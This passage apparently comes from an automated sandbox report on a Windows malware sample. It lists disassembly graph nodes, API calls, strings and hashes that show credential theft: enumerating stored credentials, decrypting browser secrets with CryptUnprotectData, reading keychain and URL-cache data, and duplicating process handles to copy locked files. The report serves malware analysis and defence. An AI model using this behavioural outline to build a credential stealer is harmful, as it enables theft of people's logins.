150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                      APIs
                                                      • memset.MSVCRT ref: 004455C2
                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                      • memset.MSVCRT ref: 0044570D
                                                      • memset.MSVCRT ref: 00445725
                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                        • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                      • memset.MSVCRT ref: 0044573D
                                                      • memset.MSVCRT ref: 00445755
                                                      • memset.MSVCRT ref: 004458CB
                                                      • memset.MSVCRT ref: 004458E3
                                                      • memset.MSVCRT ref: 0044596E
                                                      • memset.MSVCRT ref: 00445A10
                                                      • memset.MSVCRT ref: 00445A28
                                                      • memset.MSVCRT ref: 00445AC6
                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                      • memset.MSVCRT ref: 00445B52
                                                      • memset.MSVCRT ref: 00445B6A
                                                      • memset.MSVCRT ref: 00445C9B
                                                      • memset.MSVCRT ref: 00445CB3
                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                      • memset.MSVCRT ref: 00445B82
                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                      • memset.MSVCRT ref: 00445986
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                      • API String ID: 1963886904-3798722523
                                                      • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                      • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                      • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                      • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                      • String ID: $/deleteregkey$/savelangfile
                                                      • API String ID: 2744995895-28296030
                                                      • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                      • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                      Control-flow Graph

                                                      APIs
                                                      • memset.MSVCRT ref: 0040B71C
                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                      • memset.MSVCRT ref: 0040B756
                                                      • memset.MSVCRT ref: 0040B7F5
                                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                      • memset.MSVCRT ref: 0040B851
                                                      • memset.MSVCRT ref: 0040B8CA
                                                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                      • memset.MSVCRT ref: 0040BB53
                                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                      • String ID: chp$v10
                                                      • API String ID: 1297422669-2783969131
                                                      • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                      • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 544 4094f7-4094fa call 424f26 540->544 542->509 544->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 559 4093e4-4093fb call 4253af * 2 555->559 557 4092bc 556->557 558 4092be-4092e3 memcpy memcmp 556->558 557->558 560 409333-409345 memcmp 558->560 561 4092e5-4092ec 558->561 559->544 569 409401-409403 559->569 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->544 570 409409-40941b memcmp 569->570 570->544 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->544 575 4094b8-4094ed memcpy * 2 572->575 573->544 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->544
                                                      APIs
                                                      • memset.MSVCRT ref: 004091E2
                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                      • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                      • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                      • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                      • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                      • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                      • String ID:
                                                      • API String ID: 3715365532-3916222277
                                                      • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                      • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                        • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                      • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                      • String ID: bhv
                                                      • API String ID: 4234240956-2689659898
                                                      • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                      • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                      APIs
                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                      • API String ID: 2941347001-70141382
                                                      • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                      • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                      Control-flow Graph

                                                      APIs
                                                      • memset.MSVCRT ref: 0040C298
                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                      • wcschr.MSVCRT ref: 0040C324
                                                      • wcschr.MSVCRT ref: 0040C344
                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                      • String ID: visited:
                                                      • API String ID: 2470578098-1702587658
                                                      • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                      • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 663 40e175-40e1a1 call 40695d call 406b90 668 40e1a7-40e1e5 memset 663->668 669 40e299-40e2a8 call 4069a3 663->669 671 40e1e8-40e1fa call 406e8f 668->671 675 40e270-40e27d call 406b53 671->675 676 40e1fc-40e219 call 40dd50 * 2 671->676 675->671 681 40e283-40e286 675->681 676->675 687 40e21b-40e21d 676->687 684 40e291-40e294 call 40aa04 681->684 685 40e288-40e290 free 681->685 684->669 685->684 687->675 688 40e21f-40e235 call 40742e 687->688 688->675 691 40e237-40e242 call 40aae3 688->691 691->675 694 40e244-40e26b _snwprintf call 40a8d0 691->694 694->675
                                                      APIs
                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                      • memset.MSVCRT ref: 0040E1BD
                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                      • free.MSVCRT ref: 0040E28B
                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                      • _snwprintf.MSVCRT ref: 0040E257
                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                      • API String ID: 2804212203-2982631422
                                                      • Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                      • Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                      • memset.MSVCRT ref: 0040BC75
                                                      • memset.MSVCRT ref: 0040BC8C
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                      • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
